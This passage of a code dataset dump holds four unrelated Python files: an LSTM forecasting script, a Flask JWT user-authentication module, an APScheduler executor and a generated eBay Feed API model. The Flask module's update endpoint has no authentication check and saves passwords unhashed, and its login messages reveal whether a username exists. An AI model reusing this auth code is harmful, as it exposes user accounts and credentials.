df=pd.read_csv(FILE_NAME,encoding='gbk')\n #df=pd.read_csv(FILE_NAME)\n #=================================常量的定义或声明====================================\n NUM_ROW = df.shape[0] #数据行数=表格行数-1(减表头)\n ROW=48 #如果报错尝试这个 将288变为相应的行数\n DATA_SIZE=48 #数据量 每个街道有DATA_SIZE个月的数据\n SITE_NUM=int(NUM_ROW/DATA_SIZE)#站点个数\n SITE_SIZE=1#分站点预测,所以只能等于1,这是最简便的更改方式\n #if(num_site>SITE_NUM):\n # print(\"本文件所有站点预测完毕\")\n # exit(0)\n for num_site in range(1,SITE_NUM+1):\n\n hourlyData=df.values[DATA_SIZE*(num_site-1):DATA_SIZE*num_site,3]\n\n\n hourlyData=hourlyData.astype('float32')#写成科学计数法(float32)\n Mon=df.values[:,2]#获得表格所有月份Mon\n\n\n X=[] #输入 根据delay个数据成一组作为X,得到输出y (一个X有delay个数据,有多组X,所以是二维的,再加上多个街道,变成三维的了)\n y=[] #输出\n pre=1 #不知道这是干啥的\n\n #设置绘图时的中文显示(需安装黑体字体)\n _rebuild()\n 
mpl.rcParams['font.sans-serif']=[u'SimHei']\n mpl.rcParams['axes.unicode_minus']=False\n #=================================================================================\n\n #输出一下得到的案件量个数\n print('aqi data length:', len(hourlyData))\n\n #立案量,转换成SITE_SIZE行DATA_SIZE列,每行代表不同的街道,每个街道有DATA_SIZE个月的数据\n hourlyData = hourlyData.reshape(SITE_SIZE,DATA_SIZE)\n\n #转置 现在每一列代表不同的街道了\n hourlyData = hourlyData.T\n\n #====================================以下为对训练样本的预处理 归一化、打乱、分训练测试组等================================\n #在进行运算之前可以对数据进行归一化,进而降低loss\n scaler = MinMaxScaler(feature_range=(0.01, 1))#这个归一化也有影响 比如要是(0,1)就无法拟合\n #scaler = MinMaxScaler()#这种有的就无法拟合\n hourlyData = scaler.fit_transform(hourlyData)\n\n #此处应该是将时间序列转换为x,y的监督学习问题\n for d in range(delay,len(hourlyData)-pre+1):\n X_one=hourlyData[d-delay:d,:]#二维\n X_one=X_one.reshape((1,X_one.shape[0],X_one.shape[1]))#转三维 1页1行10列\n y_one=hourlyData[d,:]\n X.append(X_one)\n y.append(y_one)\n X=np.array(X).reshape((len(X),delay,SITE_SIZE)) #reshape页、行、列 三维\n y=np.array(y) #二维\n\n\n '''\n print(\"X\")\n print(X)\n print(\"y\")\n print(y)\n '''\n '''\n #shuffle data\n #随机排列x,y,Mon,但一一对应\n random.seed(10)\n random.shuffle(X)\n random.seed(10)\n random.shuffle(y)\n random.seed(10)\n random.shuffle(Mon)\n \n #split dataset\n #将数据分成训练组和测试组 前80%的数据作为训练,后20%的数据作为测试\n trLen=int(0.8*X.shape[0])\n train_set_x=X[:trLen,:]\n train_set_y=y[:trLen]\n test_set_x = X[trLen:,:]\n test_set_y=y[trLen:]\n '''\n\n\n Mon = np.linspace(delay+1,DATA_SIZE,DATA_SIZE-delay)\n #Mon = np.linspace(1,DATA_SIZE,DATA_SIZE)\n #shuffle data\n\n '''\n np.random.seed(10)\n np.random.shuffle(X)\n np.random.seed(10)\n np.random.shuffle(y)\n np.random.seed(10)\n np.random.shuffle(Mon)\n '''\n #shuffle data\n index=np.arange(DATA_SIZE-delay)\n np.random.shuffle(index)\n X=X[index,:,:]\n y=y[index]\n Mon=Mon[index]\n\n\n #split dataset\n trLen=int(0.8*X.shape[0])\n train_set_x=X[:trLen,:]\n train_set_y=y[:trLen]\n test_set_x = X[trLen:,:]\n test_set_y=y[trLen:]\n\n\n\n '''\n print(\"train_set_x\")\n print(train_set_x)\n print(\"train_set_y\")\n print(train_set_y)\n print(\"test_set_x\")\n print(test_set_x)\n print(\"test_set_y\")\n print(test_set_y)\n '''\n\n #====================================================================\n\n #==========================================本模块采用LSTM建模================================================\n # build the model: 2 stacked LSTM\n print('Build model...')\n input_shape = (delay,SITE_SIZE) #每delay个数据预测一个 输入格式为delay行SITE_SIZE列的矩阵\n main_input = Input(shape=input_shape, name='main_input')\n\n rnn_out = LSTM(my_node, return_sequences=True,consume_less = 'gpu')(main_input)\n x = LSTM(my_node,consume_less = 'gpu')(rnn_out)\n\n #4、在后面连接一个隐层,输入为rnn输出和时间信息,采用sigmoid激活\n x = Dense(500, activation='relu')(x)\n #5、添加一个dropout层防止过拟合\n x = Dropout(0.5)(x)\n #6、后面添加一个隐层,采用relu作为激活函数,根据relu的特性,可以直接输出实数\n #x = Dense(100, activation='relu')(x)\n #7、继续使用relu输出最终预测值\n loss = Dense(SITE_SIZE, activation='relu', name='main_output')(x)\n\n #使用刚才创建的图生成模型\n model = Model(input=[main_input], output=[loss])\n\n solver = Adam(lr=my_lr) #学习率为0.001 一条直线的有可能是学习率过大的缘故\n model.compile(optimizer=solver,\n loss={'main_output': 'mape'} ) #optimizer优化器选择Adam 回头可以再尝试一下RMSprop\n #损失函数loss用的mape?\n\n #=============================================================================================\n\n\n\n #定义精度计算公式\n def cal_acc(pre,real):\n pre = scaler.inverse_transform(pre)\n real = scaler.inverse_transform(real)\n [m,n]=pre.shape\n pre=pre.reshape(m*n,1)\n real=real.reshape(m*n,1)\n acc=np.zeros((4,1))\n 
acc[0]=np.sqrt(((pre-real)**2).mean())\n acc[1]=(abs(pre-real)).mean()\n acc[2]=(abs(pre-real)/real).mean()\n acc[3]=1-sum((pre-real)**2)/sum((abs(pre-real.mean())+abs(real-real.mean()))**2)\n return acc.transpose()\n\n #把模型写入jason文件中,权重记录在.hdf5中?因为每次的权中事随机的\n model_json = model.to_json()\n model_path = '$8.json'\n model_weight_path = '$8_weights.hdf5'\n with open(model_path, \"w\") as json_file:\n json_file.write(model_json)\n\n #迭代次数为100次\n epoches = 80\n #生成epoches行4列的零矩阵\n acc_tr=np.zeros((epoches,4))\n acc_t=np.zeros((epoches,4))\n history = []\n\n #生成epoches行2列的零矩阵\n #msemae_tr = np.zeros((epoches,2))\n #msemae_t = np.zeros((epoches,2))\n\n #================================================================训练LSTM=====================================\n '''\n def scheduler(epoch):\n # 每隔50个epoch,学习率减小为原来的1/10\n if epoch % 50 == 0 and epoch != 0:\n lr = K.get_value(model.optimizer.lr)\n K.set_value(model.optimizer.lr, lr * 0.1)\n print(\"lr changed to {}\".format(lr * 0.1))\n return K.get_value(model.optimizer.lr)\n '''\n #开始迭代\n for epoch in range(epoches):\n print()\n print('-' * 50)\n print('epoch', epoch)\n #reduce_lr = LearningRateScheduler(scheduler)\n\n if epoch==50:\n solver = Adam(lr=my_lr/10)#降低学习率\n model.compile(optimizer=solver,\n loss={'main_output': 'mape'} )\n '''\n hist = model.fit({'main_input': train_set_x},\n {'main_output': train_set_y},validation_data=(\n {'main_input': test_set_x, },\n {'main_output': test_set_y}\n ),verbose = 1,\n nb_epoch=10, batch_size=16,callbacks=[reduce_lr]) #batch_size待确定 nb_epoch是训练数据遍历的次数\n '''\n hist = model.fit({'main_input': train_set_x},\n {'main_output': train_set_y},validation_data=(\n {'main_input': test_set_x, },\n {'main_output': test_set_y}\n ),verbose = 1,\n nb_epoch=10, batch_size=my_batch_size)\n acc_tr[epoch,:]=cal_acc(model.predict([train_set_x]),train_set_y)\n acc_t[epoch,:]=cal_acc(model.predict([test_set_x]),test_set_y)\n #msemae_tr[epoch,:] = cal_msemae_tr()\n #msemae_t[epoch,:] = cal_msemae_t()\n history.extend(hist.history.values())\n history = np.array(history).reshape((-1,1))\n if model_weight_path:\n if os.path.exists(model_weight_path):\n os.remove(model_weight_path)\n model.save_weights(model_weight_path) # eg: model_weight.h5\n #========================================================================================================\n\n #输出精度acc\n a=[acc_tr[:,3],acc_t[:,3]]\n a=np.array(a)\n a=a.T\n\n #定义预测值\n trainPredict = model.predict(train_set_x)\n testPredict = model.predict(test_set_x)\n\n #反归一化:如在开始时进行了归一化则取消以下代码的注释\n hourlyData = scaler.inverse_transform(hourlyData)\n trainPredict = scaler.inverse_transform(trainPredict)\n train_set_y = scaler.inverse_transform(train_set_y)\n testPredict = scaler.inverse_transform(testPredict)\n test_set_y = scaler.inverse_transform(test_set_y)\n\n #将数据按站点分为SITE_SIZE组\n site_names=[] #站点数据列表\n site_cnames=[] #站点名字列表\n #site_cnames.append(df.at[(num_site-1)*DATA_SIZE, u'事发街道'])\n site_cnames.append(\"站点\"+str(num_site))#隐藏站点名称\n site_names.append(hourlyData[:,0])\n\n\n #作图:立案量vs时间\n plt.figure(figsize=(16,9))\n layout_num = 0\n for i in range(0,SITE_SIZE):\n if(layout_num==1):\n layout_num=0\n plt.figure(figsize=(16, 9))\n plt.suptitle(u'各地点按月立案数量')\n subplot = plt.subplot(1, 1, layout_num + 1)\n site = site_names[i]\n plt.plot(site_names[i])\n plt.xlabel(u'时间')\n plt.ylabel(u'立案量')\n plt.legend(labels=[u'立案量'],loc = 'best')\n subplot.set_title(str(NAME)+'-'+site_cnames[i]+u\"-当前打乱的原始数据\")\n plt.tight_layout()\n layout_num = layout_num + 1\n 
plt.savefig(F_NAME+NAME+'-'+str(site_cnames[0])+\"-当前打乱的原始数据.png\")\n\n #作图:精度vs迭代次数\n plt.figure(figsize=(16,9))\n #x2 = np.linspace(1,100,len(a[:,0]))\n #x21 = np.linspace(1,100,len(a[:,1]))\n plt.plot(a[:,0])\n plt.plot(a[:,1])\n plt.xlabel(u'迭代次数')\n plt.ylabel(u'精度')\n plt.title(str(NAME)+'-'+str(site_cnames[0])+u'-测试/训练精度与时间对比')\n plt.legend(labels = [u'训练精度',u'测试精度'],loc ='best')\n plt.savefig(F_NAME+NAME+'-'+str(site_cnames[0])+\"-精度.png\")\n\n #作图:真实值&预测值vs时间\n #训练数据组\n\n plt.figure(figsize=(16,9))\n #plt.suptitle(u'分站点预测/实际值对比(训练数据)')\n layout_num = 0\n for i in range(0,SITE_SIZE):\n if(layout_num==6):\n layout_num=0\n plt.figure(figsize=(16, 9))\n plt.suptitle(u'分站点预测/实际值对比(训练数据)')\n subplot = plt.subplot(1, 1, layout_num + 1)\n #site = site_names[i]\n plt.plot(trainPredict[:, i])\n plt.plot(train_set_y[:, i])\n plt.xlabel(u'数据编号')\n plt.ylabel(u'数值')\n plt.legend(labels=[u'预测数据',u'实际数据'])\n subplot.set_title(str(NAME)+'-'+site_cnames[i]+u'-预测/实际值对比(训练数据)')\n plt.tight_layout()\n layout_num = layout_num + 1\n plt.savefig(F_NAME+NAME+'-'+str(site_cnames[0])+\"-训练预测.png\")\n\n #测试数据组\n plt.figure(figsize=(16,9))\n #plt.suptitle(u'分站点预测/实际值对比(测试数据)')\n layout_num = 0\n for i in range(0,SITE_SIZE):\n if(layout_num==6):\n layout_num=0\n plt.figure(figsize=(16, 9))\n plt.suptitle(u'分站点预测/实际值对比(测试数据)')\n subplot = plt.subplot(1, 1, layout_num + 1)\n #site = site_names[i]\n plt.plot(testPredict[:, i])\n plt.plot(test_set_y[:, i])\n plt.xlabel(u'数据编号')\n plt.ylabel(u'数值')\n plt.legend(labels=[u'预测数据',u'实际数据'])\n subplot.set_title(str(NAME)+'-'+site_cnames[i]+u'-预测/实际值对比(测试数据)')\n plt.tight_layout()\n layout_num=layout_num+1\n plt.savefig(F_NAME+NAME+'-'+str(site_cnames[0])+\"-测试预测.png\")\n #作图:MSE与MAE MAPE\n plt.figure(figsize=(16, 9))\n mseTrain = plt.subplot(321)\n maeTrain = plt.subplot(322)\n mseTest = plt.subplot(323)\n maeTest = plt.subplot(324)\n\n mapeTrain = plt.subplot(325)\n mapeTest = plt.subplot(326)\n\n\n mse=[acc_tr[:,0],acc_t[:,0]]\n mse=np.array(mse)\n mse=mse.T\n\n mae=[acc_tr[:,1],acc_t[:,1]]\n mae = np.array(mae)\n mae = mae.T\n\n mape=[acc_tr[:,2],acc_t[:,2]]\n mape = np.array(mape)\n mape = mape.T\n\n if mape[-1,-1]<=0.2:\n shutil.copyfile(F_NAME+NAME+u'-站点'+str(num_site)+'-当前打乱的原始数据.png', u'../LSTM分站点结果分析/参数'+str(PARAM_NUM)+u'极端数据图表/'+'【准】'+\n NAME+'-站点'+str(num_site)+'-当前打乱的原始数据.png')\n f = open(u'../LSTM分站点结果分析/参数'+str(PARAM_NUM)+'-分站点结果分析.txt','a')\n f.write('\\n站点'+str(num_site)+'准')\n elif mape[-1,-1]>=0.5:\n shutil.copyfile(F_NAME+NAME+u'-站点'+str(num_site)+'-当前打乱的原始数据.png', u'../LSTM分站点结果分析/参数'+str(PARAM_NUM)+u'极端数据图表/'+'【不准】'+\n NAME+'-站点'+str(num_site)+'-当前打乱的原始数据.png')\n f = open(u'../LSTM分站点结果分析/参数'+str(PARAM_NUM)+'-分站点结果分析.txt','a')\n f.write('\\n站点' + str(num_site) + '不准')\n\n msemaeList = [mseTrain,maeTrain,mseTest,maeTest,mapeTrain,mapeTest]\n msemaeData = [mse[:,0],mae[:,0],mse[:,1],mae[:,1],mape[:,0],mape[:,1]]\n msemaeLabels = [u'训练MSE',u'训练MAE',u'测试MSE',u'测试MAE','训练MAPE','测试MAPE']\n def plot4(i):\n plt.plot(msemaeData[i])\n plt.xlabel(u'迭代次数')\n plt.ylabel(u'误差值')\n for i in range(0,6):\n plt.sca(msemaeList[i])\n plot4(i)\n plt.legend(labels = [msemaeLabels[i]],loc = 'best')\n msemaeList[i].set_title(str(NAME)+'-'+str(site_cnames[0])+msemaeLabels[i])\n plt.suptitle(str(NAME)+'-'+str(site_cnames[0])+u'-训练与测试MSE/MAE/MAPE对比')\n plt.tight_layout()\n\n plt.savefig(F_NAME+NAME+'-'+str(site_cnames[0])+\"-误差.png\")\n #plt.show()\n\n\n '''\n #将预测数据输出为csv文件\n months = np.linspace(delay+1,DATA_SIZE,DATA_SIZE-10)\n months = np.array(months)\n with 
open(u\"输出文件:\"+FILE_NAME, \"w\", newline=\"\",encoding=\"utf-8-sig\") as datacsv:\n csvwriter = csv.writer(datacsv, dialect=(\"excel\"))\n first_row = [u'月份/地点']\n for i in range(0,SITE_SIZE):\n first_row.append(site_cnames[i]+u'预测')\n first_row.append(site_cnames[i]+u'实际')\n csvwriter.writerow(first_row)\n for i in range(0, trLen):\n train_row = [months[i]]\n for j in range(0, SITE_SIZE):\n train_row.append(trainPredict[i, j])\n train_row.append(train_set_y[i, j])\n csvwriter.writerow(train_row)\n for i in range(0, DATA_SIZE-trLen-10):\n test_row = [months[i + trLen]]\n for j in range(0,SITE_SIZE):\n test_row.append(testPredict[i,j])\n test_row.append(test_set_y[i,j])\n csvwriter.writerow(test_row)\n '''\n\n\n #将预测数据输出为csv文件\n #months = np.linspace(delay+1,num_Data,num_Data-10)\n months = Mon\n months = np.array(months)\n\n with open(u\"../LSTM分站点输出预测数据文件/参数\"+str(PARAM_NUM)+\"/\"+NAME+\"/预测输出:\"+NAME+\"-站点\"+str(num_site)+'.csv', \"w\", newline=\"\",encoding=\"utf-8-sig\") as datacsv:\n csvwriter = csv.writer(datacsv, dialect=(\"excel\"))\n first_row = [u'月份/地点']\n for i in range(0,SITE_SIZE):\n first_row.append(site_cnames[i]+u'预测')\n first_row.append(site_cnames[i]+u'实际')\n csvwriter.writerow(first_row)\n for i in range(0, trLen):\n train_row = [months[i]]\n for j in range(0, SITE_SIZE):\n train_row.append(trainPredict[i, j])\n train_row.append(train_set_y[i, j])\n csvwriter.writerow(train_row)\n for i in range(0, DATA_SIZE-trLen-delay):\n test_row = [months[i + trLen]]\n for j in range(0,SITE_SIZE):\n test_row.append(testPredict[i,j])\n test_row.append(test_set_y[i,j])\n csvwriter.writerow(test_row)\n\n\n\n","sub_path":"code/LSTM(分站点预测-自动步骤1).py","file_name":"LSTM(分站点预测-自动步骤1).py","file_ext":"py","file_size_in_byte":20689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"74452864","text":"from flask_restful import Resource\nfrom flask import request\nfrom schema.user_schema import UserSchema,registerSchema\nfrom unitity.unitity import Tool,Model\nfrom database.user import UserModel,RevokedTokenModel\nfrom passlib.hash import pbkdf2_sha256 as sha256\nfrom flask_jwt_extended import (create_access_token, create_refresh_token, jwt_required, jwt_refresh_token_required, get_jwt_identity, get_raw_jwt)\n\nuser_schema = UserSchema(many=False)\nregister_schema = registerSchema(many=False)\nencrypt = Model()\ngetdata = Tool()\n\nclass TokenRefresh(Resource):\n @jwt_refresh_token_required\n def post(self):\n current_user = get_jwt_identity()\n access_token = create_access_token(identity = current_user)\n return {'access_token': access_token}\n\nclass Userlogin(Resource):\n\n def post(self,username):\n\n result = user_schema.load(getdata.get_param())\n user = UserModel.get_user(result['username'])\n if user == None:\n return {\n 'message': 'username not exist!'\n }, 403\n else:\n if encrypt.verify_hash(result['password'],user.password):\n access_token = create_access_token(identity = result['username'])\n refresh_token = create_refresh_token(identity = result['username'])\n return {\n 'message': '',\n 'user': user_schema.dump(user),\n 'access_token': access_token,\n 'refresh_token': refresh_token\n }\n else:\n return {\n 'message': 'password not match'\n }\n\n def put(self):\n\n result = user_schema.load(getdata.get_param())\n user = UserModel.get_user(result['username'])\n\n if user != None:\n user = UserModel(result['username'], result['email'], result ['password'])\n user.update_user()\n return {\n 'message': 'Update user success',\n 
'user': user_schema.dump(user),\n }\n else:\n return {\n 'message': 'Can not update!',\n 'user': UserModel.username\n }\n\nclass UserRegistration(Resource):\n\n def post(self):\n\n result = register_schema.load(getdata.get_param())\n user = UserModel.get_user(result['username'])\n if user != None:\n return {\n 'message': 'username {0} is exist!'.format(result['username'])\n }, 403\n else:\n try:\n user = UserModel(result['username'],result['email'],encrypt.generate_hash(result['password']))\n user.add_user()\n access_token = create_access_token(identity = result['username'])\n refresh_token = create_refresh_token(identity = result['username'])\n return {\n 'message': 'Registration success',\n 'access_token': access_token,\n 'refresh_token': refresh_token\n }\n except:\n return {\n 'message': 'database insert error',\n }\n\n return {\n 'message': '',\n 'user': user_schema.dump(user)\n }\n\nclass UserLogoutAccess(Resource):\n @jwt_required\n def post(self):\n jti = get_raw_jwt()['jti']\n try:\n revoked_token = RevokedTokenModel(jti = jti)\n revoked_token.add()\n return {'message': 'Access token has been revoked'}\n except:\n return {'message': 'Something went wrong'}, 500\n\n\nclass UserLogoutRefresh(Resource):\n @jwt_refresh_token_required\n def post(self):\n jti = get_raw_jwt()['jti']\n try:\n revoked_token = RevokedTokenModel(jti = jti)\n revoked_token.add()\n return {'message': 'Refresh token has been revoked'}\n except:\n return {'message': 'Something went wrong'}, 500\n\n#class Users(Resource):\n# def get(self):\n# return {\n# 'message': '',\n# 'users': user_schema.dump(UserModel.get_all_user())\n# }\n\n ","sub_path":"resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"537092005","text":"from __future__ import annotations\n\nfrom collections import OrderedDict\nfrom collections.abc import Coroutine\nfrom dataclasses import dataclass, field\nfrom datetime import datetime, timezone\nfrom traceback import format_exc\nfrom typing import Any, Callable, List\n\nfrom anyio import create_task_group\nfrom anyio.abc import TaskGroup\nfrom apscheduler.abc import EventHub, Executor, Job\nfrom apscheduler.eventhubs.local import LocalEventHub\nfrom apscheduler.events import (\n Event, JobAdded, JobDeadlineMissed, JobFailed, JobSuccessful, JobUpdated)\n\n\n@dataclass\nclass LocalExecutor(Executor):\n \"\"\"Runs jobs locally in a task group.\"\"\"\n\n _event_hub: EventHub = field(init=False, default_factory=LocalEventHub)\n _task_group: TaskGroup = field(init=False)\n _queued_jobs: OrderedDict[Job, None] = field(init=False, default_factory=OrderedDict)\n _running_jobs: OrderedDict[Job, None] = field(init=False, default_factory=OrderedDict)\n\n async def __aenter__(self) -> LocalExecutor:\n self._task_group = create_task_group()\n await self._task_group.__aenter__()\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:\n await self._task_group.__aexit__(exc_type, exc_val, exc_tb)\n\n async def _run_job(self) -> None:\n job = self._queued_jobs.popitem(last=False)[0]\n\n # Check if the job started before the deadline\n if job.start_deadline:\n tz = job.scheduled_start_time.tzinfo\n start_time = datetime.now(tz)\n if start_time >= job.start_deadline:\n event = JobDeadlineMissed(\n start_time, job_id=job.id, task_id=job.task_id, schedule_id=job.schedule_id,\n scheduled_start_time=job.scheduled_start_time,\n start_deadline=job.start_deadline\n )\n 
await self._event_hub.publish(event)\n return\n else:\n tz = timezone.utc\n start_time = datetime.now(tz)\n\n # Set the job as running and publish a job update event\n self._running_jobs[job] = None\n job.started_at = start_time\n event = JobUpdated(\n timestamp=datetime.now(tz), job_id=job.id, task_id=job.task_id,\n schedule_id=job.schedule_id, scheduled_start_time=job.scheduled_start_time\n )\n await self._event_hub.publish(event)\n\n try:\n return_value = job.func(*job.args, **job.kwargs)\n if isinstance(return_value, Coroutine):\n return_value = await return_value\n except Exception as exc:\n event = JobFailed(\n timestamp=datetime.now(tz), job_id=job.id, task_id=job.task_id,\n schedule_id=job.schedule_id, scheduled_start_time=job.scheduled_start_time,\n start_time=start_time, start_deadline=job.start_deadline,\n formatted_traceback=format_exc(), exception=exc)\n else:\n event = JobSuccessful(\n timestamp=datetime.now(tz), job_id=job.id, task_id=job.task_id,\n schedule_id=job.schedule_id, scheduled_start_time=job.scheduled_start_time,\n start_time=start_time, start_deadline=job.start_deadline, return_value=return_value\n )\n\n del self._running_jobs[job]\n await self._event_hub.publish(event)\n\n async def submit_job(self, job: Job) -> None:\n self._queued_jobs[job] = None\n await self._task_group.spawn(self._run_job)\n\n event = JobAdded(datetime.now(timezone.utc), job.id, job.task_id, job.schedule_id,\n job.scheduled_start_time)\n await self._event_hub.publish(event)\n\n async def get_jobs(self) -> List[Job]:\n return list(self._queued_jobs)\n\n async def subscribe(self, callback: Callable[[Event], Any]) -> None:\n await self._event_hub.subscribe(callback)\n","sub_path":"apscheduler/workers/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"226013840","text":"# coding: utf-8\n\n\"\"\"\n Feed API\n\n

The Feed API lets sellers upload input files, download reports and files including their status, filter reports using URI parameters, and retrieve customer service metrics task details.

# noqa: E501\n\n OpenAPI spec version: v1.3.1\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nclass CustomerServiceMetricTaskCollection(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'href': 'str',\n 'limit': 'int',\n 'next': 'str',\n 'offset': 'int',\n 'prev': 'str',\n 'tasks': 'list[ServiceMetricsTask]',\n 'total': 'int'\n }\n\n attribute_map = {\n 'href': 'href',\n 'limit': 'limit',\n 'next': 'next',\n 'offset': 'offset',\n 'prev': 'prev',\n 'tasks': 'tasks',\n 'total': 'total'\n }\n\n def __init__(self, href=None, limit=None, next=None, offset=None, prev=None, tasks=None, total=None): # noqa: E501\n \"\"\"CustomerServiceMetricTaskCollection - a model defined in Swagger\"\"\" # noqa: E501\n self._href = None\n self._limit = None\n self._next = None\n self._offset = None\n self._prev = None\n self._tasks = None\n self._total = None\n self.discriminator = None\n if href is not None:\n self.href = href\n if limit is not None:\n self.limit = limit\n if next is not None:\n self.next = next\n if offset is not None:\n self.offset = offset\n if prev is not None:\n self.prev = prev\n if tasks is not None:\n self.tasks = tasks\n if total is not None:\n self.total = total\n\n @property\n def href(self):\n \"\"\"Gets the href of this CustomerServiceMetricTaskCollection. # noqa: E501\n\n The URI of the current page of results. # noqa: E501\n\n :return: The href of this CustomerServiceMetricTaskCollection. # noqa: E501\n :rtype: str\n \"\"\"\n return self._href\n\n @href.setter\n def href(self, href):\n \"\"\"Sets the href of this CustomerServiceMetricTaskCollection.\n\n The URI of the current page of results. # noqa: E501\n\n :param href: The href of this CustomerServiceMetricTaskCollection. # noqa: E501\n :type: str\n \"\"\"\n\n self._href = href\n\n @property\n def limit(self):\n \"\"\"Gets the limit of this CustomerServiceMetricTaskCollection. # noqa: E501\n\n The value of the limit parameter submitted in the request, which is the maximum number of tasks to return per page, from the result set. A result set is the complete set of tasks returned by the method. Note: Even though this parameter is not required to be submitted in the request, the parameter defaults to 10 if omitted. Note: If this is the last or only page of the result set, the page may contain fewer tasks than the limit value. To determine the number of pages in a result set, divide the total value (total number of tasks matching input criteria) by this limit value, and then round up to the next integer. For example, if the total value was 120 (120 total tasks) and the limit value was 50 (show 50 tasks per page), the total number of pages in the result set is three, so the seller would have to make three separate getCustomerServiceMetricTasks calls to view all tasks matching the input criteria. # noqa: E501\n\n :return: The limit of this CustomerServiceMetricTaskCollection. 
# noqa: E501\n :rtype: int\n \"\"\"\n return self._limit\n\n @limit.setter\n def limit(self, limit):\n \"\"\"Sets the limit of this CustomerServiceMetricTaskCollection.\n\n The value of the limit parameter submitted in the request, which is the maximum number of tasks to return per page, from the result set. A result set is the complete set of tasks returned by the method. Note: Even though this parameter is not required to be submitted in the request, the parameter defaults to 10 if omitted. Note: If this is the last or only page of the result set, the page may contain fewer tasks than the limit value. To determine the number of pages in a result set, divide the total value (total number of tasks matching input criteria) by this limit value, and then round up to the next integer. For example, if the total value was 120 (120 total tasks) and the limit value was 50 (show 50 tasks per page), the total number of pages in the result set is three, so the seller would have to make three separate getCustomerServiceMetricTasks calls to view all tasks matching the input criteria. # noqa: E501\n\n :param limit: The limit of this CustomerServiceMetricTaskCollection. # noqa: E501\n :type: int\n \"\"\"\n\n self._limit = limit\n\n @property\n def next(self):\n \"\"\"Gets the next of this CustomerServiceMetricTaskCollection. # noqa: E501\n\n The relative path to the call URI for the next page of results. This value is returned if there is an additional page of results to return from the result set. # noqa: E501\n\n :return: The next of this CustomerServiceMetricTaskCollection. # noqa: E501\n :rtype: str\n \"\"\"\n return self._next\n\n @next.setter\n def next(self, next):\n \"\"\"Sets the next of this CustomerServiceMetricTaskCollection.\n\n The relative path to the call URI for the next page of results. This value is returned if there is an additional page of results to return from the result set. # noqa: E501\n\n :param next: The next of this CustomerServiceMetricTaskCollection. # noqa: E501\n :type: str\n \"\"\"\n\n self._next = next\n\n @property\n def offset(self):\n \"\"\"Gets the offset of this CustomerServiceMetricTaskCollection. # noqa: E501\n\n The number of results skipped in the result set before returning the first result. This value can be set in the request with the offset query parameter. Note: The items in a paginated result set use a zero-based list where the first item in the list has an offset of 0. # noqa: E501\n\n :return: The offset of this CustomerServiceMetricTaskCollection. # noqa: E501\n :rtype: int\n \"\"\"\n return self._offset\n\n @offset.setter\n def offset(self, offset):\n \"\"\"Sets the offset of this CustomerServiceMetricTaskCollection.\n\n The number of results skipped in the result set before returning the first result. This value can be set in the request with the offset query parameter. Note: The items in a paginated result set use a zero-based list where the first item in the list has an offset of 0. # noqa: E501\n\n :param offset: The offset of this CustomerServiceMetricTaskCollection. # noqa: E501\n :type: int\n \"\"\"\n\n self._offset = offset\n\n @property\n def prev(self):\n \"\"\"Gets the prev of this CustomerServiceMetricTaskCollection. # noqa: E501\n\n The URI for the previous page of results. This parameter is returned if a previous page of results from the result set exists. # noqa: E501\n\n :return: The prev of this CustomerServiceMetricTaskCollection. 
# noqa: E501\n :rtype: str\n \"\"\"\n return self._prev\n\n @prev.setter\n def prev(self, prev):\n \"\"\"Sets the prev of this CustomerServiceMetricTaskCollection.\n\n The URI for the previous page of results. This parameter is returned if a previous page of results from the result set exists. # noqa: E501\n\n :param prev: The prev of this CustomerServiceMetricTaskCollection. # noqa: E501\n :type: str\n \"\"\"\n\n self._prev = prev\n\n @property\n def tasks(self):\n \"\"\"Gets the tasks of this CustomerServiceMetricTaskCollection. # noqa: E501\n\n An array of the customer service tasks on this page. The tasks are sorted by creation date. An empty array is returned if the filter criteria excludes all tasks. # noqa: E501\n\n :return: The tasks of this CustomerServiceMetricTaskCollection. # noqa: E501\n :rtype: list[ServiceMetricsTask]\n \"\"\"\n return self._tasks\n\n @tasks.setter\n def tasks(self, tasks):\n \"\"\"Sets the tasks of this CustomerServiceMetricTaskCollection.\n\n An array of the customer service tasks on this page. The tasks are sorted by creation date. An empty array is returned if the filter criteria excludes all tasks. # noqa: E501\n\n :param tasks: The tasks of this CustomerServiceMetricTaskCollection. # noqa: E501\n :type: list[ServiceMetricsTask]\n \"\"\"\n\n self._tasks = tasks\n\n @property\n def total(self):\n \"\"\"Gets the total of this CustomerServiceMetricTaskCollection. # noqa: E501\n\n The total number of tasks that match the criteria. # noqa: E501\n\n :return: The total of this CustomerServiceMetricTaskCollection. # noqa: E501\n :rtype: int\n \"\"\"\n return self._total\n\n @total.setter\n def total(self, total):\n \"\"\"Sets the total of this CustomerServiceMetricTaskCollection.\n\n The total number of tasks that match the criteria. # noqa: E501\n\n :param total: The total of this CustomerServiceMetricTaskCollection. 
# noqa: E501\n :type: int\n \"\"\"\n\n self._total = total\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(CustomerServiceMetricTaskCollection, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return 